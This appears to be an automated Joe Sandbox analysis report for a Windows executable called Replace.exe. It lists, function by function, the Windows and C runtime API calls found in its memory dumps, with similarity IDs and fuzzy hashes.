                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD424E
                                                                                                                                                                                                                • Part of subcall function 00BD1BFB: RtlFreeHeap.NTDLL(00000000,00000000,?,00BD42C9,?,00000000,?,00000001,?,00BD42F0,?,00000007,?,?,00BD4716,?), ref: 00BD1C11
                                                                                                                                                                                                                • Part of subcall function 00BD1BFB: GetLastError.KERNEL32(?,?,00BD42C9,?,00000000,?,00000001,?,00BD42F0,?,00000007,?,?,00BD4716,?,?), ref: 00BD1C23
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD4260
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD4272
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD4284
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD4296
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                              • Opcode ID: a6d834771e8c14cad08c139b658d696a49d5a496b287ea207789e3ec5c4fa485
                                                                                                                                                                                                              • Instruction ID: 0649052c193ce398176a48b8b5d3a8e84e6082c24a77092a44633a605021f491
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a6d834771e8c14cad08c139b658d696a49d5a496b287ea207789e3ec5c4fa485
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56F0FF725292406F8624EB6CE5C6C5AF3E9EA147507540D8BF184DB701EF31FC804E64
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32 ref: 00BB7BB6
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32 ref: 00BB7BC1
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32 ref: 00BB7BC7
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00BB7BCF
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32 ref: 00BB7BD6
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32 ref: 00BB7BDC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$Enter$Leave$Sleep
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2452663664-0
                                                                                                                                                                                                              • Opcode ID: ffc21e6261e67874a9ba6f896b7ab50ae5a9f6de474ad48da135090709125539
                                                                                                                                                                                                              • Instruction ID: d044b973b295935455f2e2193873621819c22cf0ecbf87bbfd3d54f1dd3c421f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ffc21e6261e67874a9ba6f896b7ab50ae5a9f6de474ad48da135090709125539
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A9E0E5122CB618E7823123751C30DFBEBDC8E9725130A0446E38093210DFD558014AA4
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00BB1EC5
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000075), ref: 00BB1ED1
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00BB1F3C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                              • String ID: _
                                                                                                                                                                                                              • API String ID: 1717984340-701932520
                                                                                                                                                                                                              • Opcode ID: f8cb6c62b10f06861b4b3e344937778c1b80d72e9fc3f4c9a1563f4e43eec709
                                                                                                                                                                                                              • Instruction ID: b7eb754de67549823eb2eafb4842fccc3449be41f405a4f5e5cd69411fcd9886
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f8cb6c62b10f06861b4b3e344937778c1b80d72e9fc3f4c9a1563f4e43eec709
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16317870108346EFDB15CF19D854ABBBBE9EF95304F04886DF09486210E3B0DD08DB62
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AdjustPointer
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1740715915-0
                                                                                                                                                                                                              • Opcode ID: 3844a8e965091c76b159446659c498e34039480d25ef15a3ade92253f53aec35
                                                                                                                                                                                                              • Instruction ID: 29da500f8a87ad32ff5d333a7c74a1a66434d7b6e8199687a637bdea240340fc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3844a8e965091c76b159446659c498e34039480d25ef15a3ade92253f53aec35
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D551AD72600207EFEB299F14D881F7AB7E6EB04B00F2481FEE91597292E731AD41C790
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BD2F57: _free.LIBCMT ref: 00BD2F65
                                                                                                                                                                                                                • Part of subcall function 00BD3B2B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00BD6B3F,0000FDE9,00000000,?,?,?,00BD68B8,0000FDE9,00000000,?), ref: 00BD3BD7
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00BD299D
                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00BD29A4
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00BD29E3
                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00BD29EA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 167067550-0
                                                                                                                                                                                                              • Opcode ID: 965485f4e9c6e5e98290195d126b144f6968b8deea70db43f29e939b1ee49bcc
                                                                                                                                                                                                              • Instruction ID: b09ffdb0f749d468a834c04686d060b42015465feca7778aa7445c41da1b4d12
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 965485f4e9c6e5e98290195d126b144f6968b8deea70db43f29e939b1ee49bcc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8421C471604255BF9B20AF658CD092BF7ECEF2436471049A7F82997345FB34EC019BA0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00BD0380,00BE47D8,0000000C), ref: 00BD1F79
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD1FD6
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD200C
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,00BD0380,00BE47D8,0000000C), ref: 00BD2017
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast_free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2283115069-0
                                                                                                                                                                                                              • Opcode ID: 0a7d515ee619d94371fd60ecfa8b01a382a90f09b5531bc6c99879648b7622e1
                                                                                                                                                                                                              • Instruction ID: 7ec6e051e0a3b53b1bac4e962bcdb42a26ae63734be8f8f8451276a5f475f28e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a7d515ee619d94371fd60ecfa8b01a382a90f09b5531bc6c99879648b7622e1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD11A7323055A07A9621776D6CC1D2BA7DADBA07B572405A7FA28C73A2FF254C055510
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32(00000072,-00000086,00000001,00BD1B90,00BD27C0,-00000126,?,00BCC0D5,-00000086,00000022,00BB16C5,00000008,74DF2EE0,00BCB6C9), ref: 00BD20D0
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD212D
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD2163
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,00000005,000000FF,?,00BCC0D5,-00000086,00000022,00BB16C5,00000008,74DF2EE0,00BCB6C9), ref: 00BD216E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast_free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2283115069-0
                                                                                                                                                                                                              • Opcode ID: 4324b912107885ae4042dc34db38136d17390fa7a906ccd80dbb00045f695942
                                                                                                                                                                                                              • Instruction ID: 5147b2973eeb7de31986ef24f578c60b6aa2c9d9321b8615a2bff0533d420279
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4324b912107885ae4042dc34db38136d17390fa7a906ccd80dbb00045f695942
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E110C322065E17AD6216778ACC5D2BA7DADBF07B172102E7FB24D73E2FE218C055510
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00BB358A
                                                                                                                                                                                                                • Part of subcall function 00BB227E: CreateFileA.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 00BB22B6
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,00000000,00000001,00000003,02000000,00000040,00BB353A,?,?,?,00000054,00BB2D36,00000000,00000000), ref: 00BB35C0
                                                                                                                                                                                                              • GetFileInformationByHandle.KERNEL32(?,-00000022,?,00000000,00000001,00000003,02000000,00000040,00BB353A,?,?,?,00000054,00BB2D36,00000000,00000000), ref: 00BB35CF
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,00000054,00BB2D36,00000000,00000000), ref: 00BB35E3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$CloseFile$CreateH_prolog3_Information
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2437482437-0
                                                                                                                                                                                                              • Opcode ID: 876788944dfb2e29d30ef352151e5ae7c196d4ef94ce62469f45162f7d75156c
                                                                                                                                                                                                              • Instruction ID: ec91e17402a0ca29e9e65fba63d39ab5543dc27399b273d540e4fa85bc24dd7c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 876788944dfb2e29d30ef352151e5ae7c196d4ef94ce62469f45162f7d75156c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9421FA70D01704DBDB28CFA4E854A9DBBF1BF18710F10866EE46AA7390D7716A06CF50
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BB2EDD: FindClose.KERNEL32(0000002A,0000002A,00BB2F26,?,?,00000001), ref: 00BB2EE7
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000078,?,?,00000001), ref: 00BB2FD6
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,00000001), ref: 00BB2FF1
                                                                                                                                                                                                              • FindFirstStreamW.KERNELBASE(FFFFFBEF,00000000,?,00000000), ref: 00BB3003
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00BB3010
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Find$CloseFirstStream
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4071060300-0
                                                                                                                                                                                                              • Opcode ID: b1fcba3cea5a37e0649b47565ad0eb6809473fa1cf6b70ecf157e5754037c8b0
                                                                                                                                                                                                              • Instruction ID: 6b9df901f19dc21a37e36a516e03e820dcb69a02f09102c70a99bb83bd7dfa9c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1fcba3cea5a37e0649b47565ad0eb6809473fa1cf6b70ecf157e5754037c8b0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6911A031504208DFCB20AF64DC89BFAB3F9EB55711F10469AE91597290DFB09A84CB51
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000078), ref: 00BB2529
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 00BB2548
                                                                                                                                                                                                              • SetFileTime.KERNEL32(00000000,00000000,00000000,?,?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 00BB255C
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 00BB2568
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$CloseCreateErrorHandleLastTime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2291555494-0
                                                                                                                                                                                                              • Opcode ID: 85ddb4bf0223cd396487083e95c7ecbf4b18e77ce02b776532418dc67d95b5b5
                                                                                                                                                                                                              • Instruction ID: 6f9892523368345a8208775d47647e9164cba89bd3f09c96de76105c5f2d4aae
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 85ddb4bf0223cd396487083e95c7ecbf4b18e77ce02b776532418dc67d95b5b5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AFF0E570582318BFF3201B30ACA8FBB678DEF15354F014246F161A70E09B944E099370
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00BD70F4,00000000,00000001,00000000,00000000,?,00BD658E,?,?,00000000), ref: 00BD76AD
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00BD70F4,00000000,00000001,00000000,00000000,?,00BD658E,?,?,00000000,?,00000000,?,00BD6ADA,00000020), ref: 00BD76B9
                                                                                                                                                                                                                • Part of subcall function 00BD767F: CloseHandle.KERNEL32(FFFFFFFE,00BD76C9,?,00BD70F4,00000000,00000001,00000000,00000000,?,00BD658E,?,?,00000000,?,00000000), ref: 00BD768F
                                                                                                                                                                                                              • ___initconout.LIBCMT ref: 00BD76C9
                                                                                                                                                                                                                • Part of subcall function 00BD7641: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00BD7670,00BD70E1,00000000,?,00BD658E,?,?,00000000,?), ref: 00BD7654
                                                                                                                                                                                                              • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00BD70F4,00000000,00000001,00000000,00000000,?,00BD658E,?,?,00000000,?), ref: 00BD76DE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2744216297-0
                                                                                                                                                                                                              • Opcode ID: 69fd18e5c2a0a1462d7b1faf08b73286d9cdb2bae0fb2391aad7b870d185a9ad
                                                                                                                                                                                                              • Instruction ID: 61c2a4b234c43bcdd6601cb1542c120be88a5cfa0ef30b747cfa8b6456d925a1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 69fd18e5c2a0a1462d7b1faf08b73286d9cdb2bae0fb2391aad7b870d185a9ad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A0F01C36045558FBCF222F96DC14DCEBFA6EB187A0B014052FA1886220FF32C820DB94
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD1623
                                                                                                                                                                                                                • Part of subcall function 00BD1BFB: RtlFreeHeap.NTDLL(00000000,00000000,?,00BD42C9,?,00000000,?,00000001,?,00BD42F0,?,00000007,?,?,00BD4716,?), ref: 00BD1C11
                                                                                                                                                                                                                • Part of subcall function 00BD1BFB: GetLastError.KERNEL32(?,?,00BD42C9,?,00000000,?,00000001,?,00BD42F0,?,00000007,?,?,00BD4716,?,?), ref: 00BD1C23
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD1636
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD1647
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD1658
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                              • Opcode ID: dda4c30aac04319d6173a8c9764fc9581e8975240c3cdf388c111e25aec18b60
                                                                                                                                                                                                              • Instruction ID: 1ffd10b1539cdb91c931fefc26c0b2ec641e12223bc97f6bc35920891a31803b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dda4c30aac04319d6173a8c9764fc9581e8975240c3cdf388c111e25aec18b60
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16E04FB148D5E0BA86026F18BEC185A7BB5EF4871030018A7F5000B331EF3246939E84
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\Replace.exe
                                                                                                                                                                                                              • API String ID: 0-2253954093
                                                                                                                                                                                                              • Opcode ID: 46aa90ab370cff26dcf584201a7f8dd8160c3082742fc77ed68c89305273feda
